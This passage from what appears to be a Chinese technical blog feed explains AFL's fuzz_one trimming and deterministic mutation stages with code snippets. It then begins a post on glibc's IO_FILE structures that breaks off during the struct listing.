queue_entry* q, u8* in_buf)</code></p><ol><li><p>长度小于5直接返回</p></li><li><p>令<code>len_p2=2^x > q->len</code>,remove_len取len_p2/16与4的最大值</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">len_p2</span> = next_p2(q->len)<span class="hljs-comment">;</span><br><span class="hljs-attr">remove_len</span> = MAX(len_p2 / TRIM_START_STEPS, TRIM_MIN_BYTES)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li><li><p>循环判断remove_len是否大于最小步长max(len_p2 /1024,4),满足则继续,否则跳转到7</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">while</span> (remove_len >= <span class="hljs-constructor">MAX(<span class="hljs-params">len_p2</span> <span class="hljs-operator">/</span> TRIM_END_STEPS, TRIM_MIN_BYTES)</span>)<br></code></pre></td></tr></table></figure></li><li><p>格式化remove_len到tmp</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">sprintf(tmp, <span class="hljs-string">"trim %s/%s"</span>, <span class="hljs-constructor">DI(<span class="hljs-params">remove_len</span>)</span>, <span class="hljs-constructor">DI(<span class="hljs-params">remove_len</span>)</span>);<br></code></pre></td></tr></table></figure></li><li><p>内部循环,根据 remove_pos, trim_avail生成新case</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">while</span> (remove_pos < q-></span>len){<br><span class="hljs-function"><span class="hljs-title">write_with_gap</span>(in_buf, q-></span>len, remove_pos, trim_avail);<br>fault = run_target(argv, exec_tmout);<br>cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST);<br><span class="hljs-function"><span class="hljs-title">if</span> (cksum == q-></span>exec_cksum){……}<br><span class="hljs-keyword">else</span> remove_pos += remove_len<br>}<br></code></pre></td></tr></table></figure><p><code>static void write_with_gap(void* mem, u32 len, u32 skip_at, u32 skip_len)</code> </p><p>功能:删除skip_at开始skip_len长度的内容,新内容存储于mem(此处为in_buf)</p><p>运行一次新case,确认当前删除是否影响bitmap</p><ul><li>如果不影响,保存这次缩减</li><li>否则remove_pos后移步长remove_len</li></ul></li><li><p>remove_len/2,回到3进行判断</p><figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs basic"><span class="hljs-comment">remove_len >>= 1;</span><br></code></pre></td></tr></table></figure></li><li><p>needs_write为1(在5的if中设置)说明case需要更新,把in_buf内容写入文件,并更新bitmap信息</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">if</span> (needs_write){<br>ck<span class="hljs-constructor">_write(<span class="hljs-params">fd</span>, <span class="hljs-params">in_buf</span>, <span class="hljs-params">q</span>-><span class="hljs-params">len</span>, <span class="hljs-params">q</span>-><span class="hljs-params">fname</span>)</span>;<br>memcpy(trace_bits, clean_trace, MAP_SIZE);<br>update<span class="hljs-constructor">_bitmap_score(<span class="hljs-params">q</span>)</span>;<br>}<br></code></pre></td></tr></table></figure></li></ol><h3 id="fuzz-one-PERFORMANCE-SCORE"><a href="#fuzz-one-PERFORMANCE-SCORE" class="headerlink" title="fuzz_one PERFORMANCE SCORE"></a>fuzz_one PERFORMANCE SCORE</h3><ol><li><p>调用<code>calculate_score(queue_cur)</code>计算当前queue_cur的score</p></li><li><p>如果设置了skip_deterministic或者queue_cur->was_fuzzed或者queue_cur->passed_det=1</p><p>如果当前的<code>queue_cur->exec_cksum % master_max</code>不等于master_id - 1</p><p>跳转havoc_stage</p></li></ol><h2 id="fuzz-one变异"><a href="#fuzz-one变异" class="headerlink" title="fuzz_one变异"></a>fuzz_one变异</h2><p>考虑到这部分代码比较长,我主要从功能上入手,结合部分代码分析</p><p>变异分为6个阶段</p><ul><li><strong>SIMPLE BITFLIP (+dictionary construction)阶段</strong></li><li><strong>ARITHMETIC INC/DEC 阶段</strong></li><li><strong>INTERESTING VALUES阶段</strong></li><li><strong>DICTIONARY STUFF阶段</strong></li><li><strong>RANDOM HAVOC阶段</strong></li><li><strong>SPLICING阶段</strong></li></ul><h3 id="SIMPLE-BITFLIP-dictionary-construction-阶段"><a href="#SIMPLE-BITFLIP-dictionary-construction-阶段" class="headerlink" title="SIMPLE BITFLIP (+dictionary construction)阶段"></a><strong>SIMPLE BITFLIP (+dictionary construction)阶段</strong></h3><p>按位翻转,每次都是比特位级别的操作,从 1bit 到 32bit </p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs gcode"><span class="hljs-attr">#define FLIP_BIT(_ar, _b) do { \</span><br><span class="hljs-attr"> u8</span>* _arf = <span class="hljs-comment">(u8*)</span><span class="hljs-comment">(_ar)</span>; \<br> u<span class="hljs-number">32</span> _bf = <span class="hljs-comment">(_b)</span>; \<br> _arf[<span class="hljs-comment">(_bf)</span> >> <span class="hljs-number">3</span>] ^= <span class="hljs-comment">(128 >> ((_bf)</span> & <span class="hljs-number">7</span>)); \<br> } <span class="hljs-keyword">while</span> <span class="hljs-comment">(0)</span><br></code></pre></td></tr></table></figure><p><code>_ar</code>是操作对象,<code>_br</code>指明操作第几个字节<code>(_bf) >> 3</code>中的第几个bit<code>(128 >> ((_bf) & 7))</code>(从高位到低位)</p><p>一个异或相当于实现了对一个指定bit位的翻转</p><h4 id="bitflip-1-x2F-1"><a href="#bitflip-1-x2F-1" class="headerlink" title="bitflip 1/1"></a>bitflip 1/1</h4><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">for</span> (stage_cur = <span class="hljs-number">0</span>; stage_cur < stage_max; stage_cur++) {<br>stage_cur_byte = stage_cur >> <span class="hljs-number">3</span>;<br><span class="hljs-constructor">FLIP_BIT(<span class="hljs-params">out_buf</span>, <span class="hljs-params">stage_cur</span>)</span>;<br><span class="hljs-keyword">if</span> (common<span class="hljs-constructor">_fuzz_stuff(<span class="hljs-params">argv</span>, <span class="hljs-params">out_buf</span>, <span class="hljs-params">len</span>)</span>) goto abandon_entry;<br><span class="hljs-constructor">FLIP_BIT(<span class="hljs-params">out_buf</span>, <span class="hljs-params">stage_cur</span>)</span>;<br>……<br>}<br></code></pre></td></tr></table></figure><ol><li><p>第一个翻转会遍历case中的每一位,每次翻转1个bit</p></li><li><p>如果翻转后,<code>common_fuzz_stuff()</code>返回1,就直接跳过整个case,否则把这个bit再翻转回来</p></li><li><p>检测token并添加</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">maybe<span class="hljs-constructor">_add_auto(<span class="hljs-params">a_collect</span>, <span class="hljs-params">a_len</span>)</span>;<br></code></pre></td></tr></table></figure><p>从注释上理解,如果在某一段连续bit上进行连续翻转后,都能让程序产生新的路径,就称连续翻转的这些bit为一个token</p></li></ol><p><code>common_fuzz_stuff(char** argv, u8* out_buf, u32 len)</code></p><ol><li><p>用新的case运行程序,获取fault</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">write<span class="hljs-constructor">_to_testcase(<span class="hljs-params">out_buf</span>, <span class="hljs-params">len</span>)</span>;<br>fault = run<span class="hljs-constructor">_target(<span class="hljs-params">argv</span>, <span class="hljs-params">exec_tmout</span>)</span>;<br></code></pre></td></tr></table></figure></li><li><p>检测超时报错</p><figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs kotlin"><span class="hljs-keyword">if</span> (fault == FAULT_TMOUT) {<br> <span class="hljs-keyword">if</span> (subseq_tmouts++ > TMOUT_LIMIT) {<br> cur_skipped_paths++;<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> } <span class="hljs-keyword">else</span> subseq_tmouts = <span class="hljs-number">0</span>;<br></code></pre></td></tr></table></figure><ul><li><p>如果FAULT_TMOUT并且subseq_tmouts(fuzz每个case时置零)未超出限制,返回1</p></li><li><p>若不是FAULT_TMOUT,subseq_tmouts=0</p></li></ul></li><li><p>用户要求进程终止,返回1</p></li><li><p>保存有价值的测试用例(覆盖率增长、计数器变化)<code>save_if_interesting()</code></p></li><li><p>返回0</p></li></ol><h4 id="bitflip-2-x2F-1"><a href="#bitflip-2-x2F-1" class="headerlink" title="bitflip 2/1"></a>bitflip 2/1</h4><p>每次连续反转2个bit,步长为1bit</p><h4 id="bitflip-4-x2F-1"><a href="#bitflip-4-x2F-1" class="headerlink" title="bitflip 4/1"></a>bitflip 4/1</h4><p>每次连续反转2个bit,步长为1bit</p><h4 id="bitflip-8-x2F-8"><a href="#bitflip-8-x2F-8" class="headerlink" title="bitflip 8/8"></a>bitflip 8/8</h4><p>增加了effector map,每次连续反转8个bit,步长为8bit</p><p>与之前找token的方式相似,如果byte翻转生成了新路径,就让这个byte在effector map中位置为1,否则为0。目的也是让后续变异参考,确认哪些位置是关键的参数,绕过无用的数据。</p><figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs excel">eff_map[<span class="hljs-number">0</span>] = <span class="hljs-number">1</span>;<br><span class="hljs-built_in">if</span> (EFF_APOS(<span class="hljs-built_in">len</span> - <span class="hljs-number">1</span>) != <span class="hljs-number">0</span>) {<br> eff_map[EFF_APOS(<span class="hljs-built_in">len</span> - <span class="hljs-number">1</span>)] = <span class="hljs-number">1</span>;<br> eff_cnt++;<br>}<br></code></pre></td></tr></table></figure><p>初始只有第一个、最后一个位置为1</p><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl">if (cksum != queue_cur->exec_cksum) {<br> eff_map[EFF_APOS(stage_cur)] = <span class="hljs-number">1</span>;<br> eff_cnt++;<br>}<br></code></pre></td></tr></table></figure><p>每次发现新路径设置1</p><figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs excel"><span class="hljs-built_in">if</span> (eff_cnt != EFF_ALEN(<span class="hljs-built_in">len</span>) &&<br> eff_cnt * <span class="hljs-number">100</span> / EFF_ALEN(<span class="hljs-built_in">len</span>) > EFF_MAX_PERC) {<br> memset(eff_map, <span class="hljs-number">1</span>, EFF_ALEN(<span class="hljs-built_in">len</span>));<br> blocks_eff_select += EFF_ALEN(<span class="hljs-built_in">len</span>);<br>}<br></code></pre></td></tr></table></figure><p>发现有效位超过90%直接全为1</p><p>注意,如果采用dumb mode或从fuzzer后续不会用到effector map的结果</p><h4 id="bitflip-16-x2F-8"><a href="#bitflip-16-x2F-8" class="headerlink" title="bitflip 16/8"></a>bitflip 16/8</h4><p>每次连续反转16个bit,步长为8bit</p><h4 id="bitflip-32-x2F-8"><a href="#bitflip-32-x2F-8" class="headerlink" title="bitflip 32/8"></a>bitflip 32/8</h4><p>每次连续反转32个bit,步长为8bit</p><h3 id="ARITHMETIC-INC-x2F-DEC-阶段"><a href="#ARITHMETIC-INC-x2F-DEC-阶段" class="headerlink" title="ARITHMETIC INC/DEC 阶段"></a><strong>ARITHMETIC INC/DEC 阶段</strong></h3><p>与位翻转不同,从 8bit 级别开始,而且每次进行的是加减运算操作</p><h4 id="arith-8-x2F-8"><a href="#arith-8-x2F-8" class="headerlink" title="arith 8/8"></a>arith 8/8</h4><p>每次对8bit进行加减运算,步长8bit</p><ol><li><p>定址,orig为每次操作的位置</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (i <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">; i < len; i++){</span><br>u8 orig <span class="hljs-operator">=</span> out_buf[i]<span class="hljs-comment">;</span><br>}<br></code></pre></td></tr></table></figure></li><li><p>effector map为0直接跳过</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if (!eff_map[EFF_APOS(<span class="hljs-name">i</span>)])<br></code></pre></td></tr></table></figure></li><li><p>循环进行前后异或,一共ARITH_MAX=35轮</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (j <span class="hljs-operator">=</span> <span class="hljs-number">1</span><span class="hljs-comment">; j <= ARITH_MAX; j++)</span><br></code></pre></td></tr></table></figure></li><li><p>org与orig+j进行异或</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">u8 r = <span class="hljs-keyword">orig </span>^ (<span class="hljs-keyword">orig </span>+ <span class="hljs-keyword">j);</span><br></code></pre></td></tr></table></figure></li><li><p>要求每次产生的case不能与bitflip产生的相同,否则直接跳过</p><p>通过orig+j的方式生成新的case进行测试</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">if</span> (!could<span class="hljs-constructor">_be_bitflip(<span class="hljs-params">r</span>)</span>) {<br> <br> stage_cur_val = j;<br> out_buf<span class="hljs-literal">[<span class="hljs-identifier">i</span>]</span> = orig + j;<br> <br> <span class="hljs-keyword">if</span> (common<span class="hljs-constructor">_fuzz_stuff(<span class="hljs-params">argv</span>, <span class="hljs-params">out_buf</span>, <span class="hljs-params">len</span>)</span>) goto abandon_entry;<br> stage_cur++;<br> <br>} <span class="hljs-keyword">else</span> stage_max--;<br></code></pre></td></tr></table></figure></li><li><p>与上一步相似,使用org-j生成新的case进行测试</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">r = <span class="hljs-keyword">orig </span>^ (<span class="hljs-keyword">orig </span>- <span class="hljs-keyword">j);</span><br><span class="hljs-keyword"></span> if (!could_be_bitflip(r)) {<br> stage_cur_val = -<span class="hljs-keyword">j;</span><br><span class="hljs-keyword"></span> out_buf[i] = <span class="hljs-keyword">orig </span>- <span class="hljs-keyword">j;</span><br><span class="hljs-keyword"></span> ……<br> } else stage_max--;<br></code></pre></td></tr></table></figure></li><li><p>恢复原case</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">out_buf[i] <span class="hljs-operator">=</span> orig<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li></ol><h4 id="arith-16-x2F-8"><a href="#arith-16-x2F-8" class="headerlink" title="arith 16/8"></a>arith 16/8</h4><p>每次对16bit进行加减运算,步长8bit,对小端、大端加减法都进行测试</p><h4 id="arith-32-x2F-8"><a href="#arith-32-x2F-8" class="headerlink" title="arith 32/8"></a>arith 32/8</h4><p>每次对32bit进行加减运算,步长8bit,对小端、大端加减法都进行测试</p><h3 id="INTERESTING-VALUES阶段"><a href="#INTERESTING-VALUES阶段" class="headerlink" title="INTERESTING VALUES阶段"></a><strong>INTERESTING VALUES阶段</strong></h3><p>使用“interesting values”对文件内容进行替换,替换内容为一系列确定的值</p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs gcode">static s<span class="hljs-number">8</span> i<span class="hljs-symbol">nteresting_8</span>[] = { I<span class="hljs-symbol">NTERESTING_8</span> };<br>static s<span class="hljs-number">16</span> i<span class="hljs-symbol">nteresting_16</span>[] = { I<span class="hljs-symbol">NTERESTING_8</span>, I<span class="hljs-symbol">NTERESTING_16</span> };<br>static s<span class="hljs-number">32</span> i<span class="hljs-symbol">nteresting_32</span>[] = { I<span class="hljs-symbol">NTERESTING_8</span>, I<span class="hljs-symbol">NTERESTING_16</span>, I<span class="hljs-symbol">NTERESTING_32</span> };<br></code></pre></td></tr></table></figure><p><img src="/image-20220504094722901.png" alt="Intersting Value"></p><h4 id="interest-8-x2F-8"><a href="#interest-8-x2F-8" class="headerlink" title="interest 8/8"></a>interest 8/8</h4><p>每次对8bit进行替换变异,步长8bit</p><ol><li><p>case遍历</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (i <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">; i < len; i++)</span><br></code></pre></td></tr></table></figure></li><li><p>eff_map检验不为0</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if (!eff_map[EFF_APOS(<span class="hljs-name">i</span>)])<br></code></pre></td></tr></table></figure></li><li><p>替换内容遍历</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (j <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">; j < sizeof(interesting_8); j++)</span><br></code></pre></td></tr></table></figure></li><li><p>要求新case不能被bitfilp和arith生成过</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if (<span class="hljs-name">could_be_bitflip</span>(<span class="hljs-name">orig</span> ^ (<span class="hljs-name">u8</span>)interesting_8[j]) ||<br> could_be_arith(<span class="hljs-name">orig</span>, (<span class="hljs-name">u8</span>)interesting_8[j], <span class="hljs-number">1</span>))<br></code></pre></td></tr></table></figure></li><li><p>朴实无华的执行并恢复原case</p><figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs inform7">stage_cur_val = interesting_8<span class="hljs-comment">[j]</span>;<br>out_buf<span class="hljs-comment">[i]</span> = interesting_8<span class="hljs-comment">[j]</span>;<br>if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry;<br>out_buf<span class="hljs-comment">[i]</span> = orig;<br></code></pre></td></tr></table></figure></li></ol><h4 id="interest-16-x2F-8"><a href="#interest-16-x2F-8" class="headerlink" title="interest 16/8"></a>interest 16/8</h4><p>每次对16bit进行替换变异,步长8bit</p><h4 id="interest-32-x2F-8"><a href="#interest-32-x2F-8" class="headerlink" title="interest 32/8"></a>interest 32/8</h4><p>每次对32bit进行替换变异,步长8bit</p><h3 id="DICTIONARY-STUFF阶段"><a href="#DICTIONARY-STUFF阶段" class="headerlink" title="DICTIONARY STUFF阶段"></a><strong>DICTIONARY STUFF阶段</strong></h3><p>用户提供的字典里有token,用来替换要进行变异的文件内容,如果用户没提供就使用 bitflip 自动生成的 token</p><h4 id="user-extras-over"><a href="#user-extras-over" class="headerlink" title="user extras (over)"></a>user extras (over)</h4><p>以8bit为步长,标记起始位置开始,替换为token</p><ol><li><p>每个字节都替换一遍</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (i <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">; i < len; i++)</span><br></code></pre></td></tr></table></figure></li><li><p>遍历用户字典</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">for (j <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">; j < extras_cnt; j++)</span><br></code></pre></td></tr></table></figure></li><li><p>在以下情况跳过当前token</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if ((<span class="hljs-name">extras_cnt</span> > MAX_DET_EXTRAS <span class="hljs-symbol">&&</span> UR(<span class="hljs-name">extras_cnt</span>) >= MAX_DET_EXTRAS) ||<br> extras[j].len > len - i ||<br> !memcmp(<span class="hljs-name">extras</span>[j].data, out_buf + i, extras[j].len) ||<br> !memchr(<span class="hljs-name">eff_map</span> + EFF_APOS(<span class="hljs-name">i</span>), <span class="hljs-number">1</span>, EFF_SPAN_ALEN(<span class="hljs-name">i</span>, extras[j].len)))<br></code></pre></td></tr></table></figure><ul><li>字典token数>200,随机生成一个小于字典token数,仍>=200</li><li>替换token后长度超过case原大小</li><li>case中数据与token一致</li><li>eff_map为0</li></ul></li><li><p>替换token,并执行新用例</p> <figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"> last_len = extras<span class="hljs-literal">[<span class="hljs-identifier">j</span>]</span>.len;<br>memcpy(out_buf + i, extras<span class="hljs-literal">[<span class="hljs-identifier">j</span>]</span>.data, last_len);<br> <span class="hljs-keyword">if</span> (common<span class="hljs-constructor">_fuzz_stuff(<span class="hljs-params">argv</span>, <span class="hljs-params">out_buf</span>, <span class="hljs-params">len</span>)</span>)<br></code></pre></td></tr></table></figure></li><li><p>所有token结束后恢复,跳回步骤1</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">memcpy(out_buf + <span class="hljs-selector-tag">i</span>, in_buf + <span class="hljs-selector-tag">i</span>, last_len);<br></code></pre></td></tr></table></figure></li></ol><h4 id="user-extras-insert"><a href="#user-extras-insert" class="headerlink" title="user extras (insert)"></a>user extras (insert)</h4><p>以8bit为步长,标记起始位置插入token</p><h4 id="auto-extras-over"><a href="#auto-extras-over" class="headerlink" title="auto extras (over)"></a>auto extras (over)</h4><p>以8bit为步长,标记起始位置开始,替换为在bitflip阶段生成的token</p><p>这是<em>deterministic steps</em>的最后一步</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">if (!queue_cur->passed_det) <span class="hljs-built_in">mark_as_det_done</span>(queue_cur);<br></code></pre></td></tr></table></figure><p>我们可以在这里设置完成状态</p><h3 id="RANDOM-HAVOC阶段"><a href="#RANDOM-HAVOC阶段" class="headerlink" title="RANDOM HAVOC阶段"></a><strong>RANDOM HAVOC阶段</strong></h3><p>进行很大程度的杂乱破坏,规则很多,随机性极强,可以说是生成了新case</p><h3 id="SPLICING阶段"><a href="#SPLICING阶段" class="headerlink" title="SPLICING阶段"></a><strong>SPLICING阶段</strong></h3><p>通过将两个case按一定规则进行拼接,得到一个新case</p><p>HAVOC和SPLICING是相结合的,拼接case后会回到havoc进行随机变异</p><p>参考文章:</p><ol><li><p>AFL源码阅读笔记之gcc与fuzz部分<a href="https://bbs.pediy.com/thread-265936.htm">https://bbs.pediy.com/thread-265936.htm</a></p></li><li><p>AFL 源码分析<a href="https://blog.csdn.net/song_lee/article/details/108244627">https://blog.csdn.net/song_lee/article/details/108244627</a></p></li><li><p>漏洞挖掘技术之 AFL 项目分析<a href="https://bbs.pediy.com/thread-249912.htm">https://bbs.pediy.com/thread-249912.htm</a></p></li></ol>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>IO_FILE结构和利用简析</title>
<link href="/2022/03/14/IO-FILE%E7%BB%93%E6%9E%84%E5%92%8C%E5%88%A9%E7%94%A8%E7%AE%80%E6%9E%90/"/>
<url>/2022/03/14/IO-FILE%E7%BB%93%E6%9E%84%E5%92%8C%E5%88%A9%E7%94%A8%E7%AE%80%E6%9E%90/</url>
<content type="html"><![CDATA[<h2 id="基本数据结构"><a href="#基本数据结构" class="headerlink" title="基本数据结构"></a>基本数据结构</h2><p>数据结构在glibc版本更新中的变化不大,所以可以从最简单的2.23代码开始分析</p><p>_IO_list_all 是一个 _IO_FILE_plus 结构体定义的一个指针</p><p> _IO_FILE_plus结构体由两个部分组成,分为<code>_IO_FILE</code>和<code>_IO_jump_t</code>指针</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">extern</span> <span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_FILE_plus</span> *_IO_list_all;<br><span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_FILE_plus</span><br>{<br> _IO_FILE file;<br> const <span class="hljs-keyword">struct</span> <span class="hljs-type">_IO_jump_t</span> *vtable;<br>};<br></code></pre></td></tr></table></figure><p><code>_IO_FILE</code>结构</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs sqf">struct <span class="hljs-variable">_IO_FILE</span> {<br> int <span class="hljs-variable">_flags</span>;<span class="hljs-comment">/* High-order word is _IO_MAGIC; rest is flags. */</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> _IO_file_flags _flags</span><br><br> <span class="hljs-comment">/* The following pointers correspond to the C++ streambuf protocol. */</span><br> <span class="hljs-comment">/* <span class="hljs-doctag">Note:</span> Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span><br> char* <span class="hljs-variable">_IO_read_ptr</span>;<span class="hljs-comment">/* Current read pointer */</span><br> char* <span class="hljs-variable">_IO_read_end</span>;<span class="hljs-comment">/* End of get area. */</span><br> char* <span class="hljs-variable">_IO_read_base</span>;<span class="hljs-comment">/* Start of putback+get area. */</span><br> char* <span class="hljs-variable">_IO_write_base</span>;<span class="hljs-comment">/* Start of put area. */</span><br> char* <span class="hljs-variable">_IO_write_ptr</span>;<span class="hljs-comment">/* Current put pointer. */</span><br> char* <span class="hljs-variable">_IO_write_end</span>;<span class="hljs-comment">/* End of put area. */</span><br> char* <span class="hljs-variable">_IO_buf_base</span>;<span class="hljs-comment">/* Start of reserve area. */</span><br> char* <span class="hljs-variable">_IO_buf_end</span>;<span class="hljs-comment">/* End of reserve area. */</span><br> <span class="hljs-comment">/* The following fields are used to support backing up and undo. */</span><br> char *<span class="hljs-variable">_IO_save_base</span>; <span class="hljs-comment">/* Pointer to start of non-current get area. */</span><br> char *<span class="hljs-variable">_IO_backup_base</span>; <span class="hljs-comment">/* Pointer to first valid character of backup area */</span><br> char *<span class="hljs-variable">_IO_save_end</span>; <span class="hljs-comment">/* Pointer to end of non-current get area. */</span><br> struct <span class="hljs-variable">_IO_marker</span> *<span class="hljs-variable">_markers</span>;<br> struct <span class="hljs-variable">_IO_FILE</span> *<span class="hljs-variable">_chain</span>;<br> int <span class="hljs-variable">_fileno</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">if</span> 0</span><br> int <span class="hljs-variable">_blksize</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">else</span></span><br> int <span class="hljs-variable">_flags2</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> <span 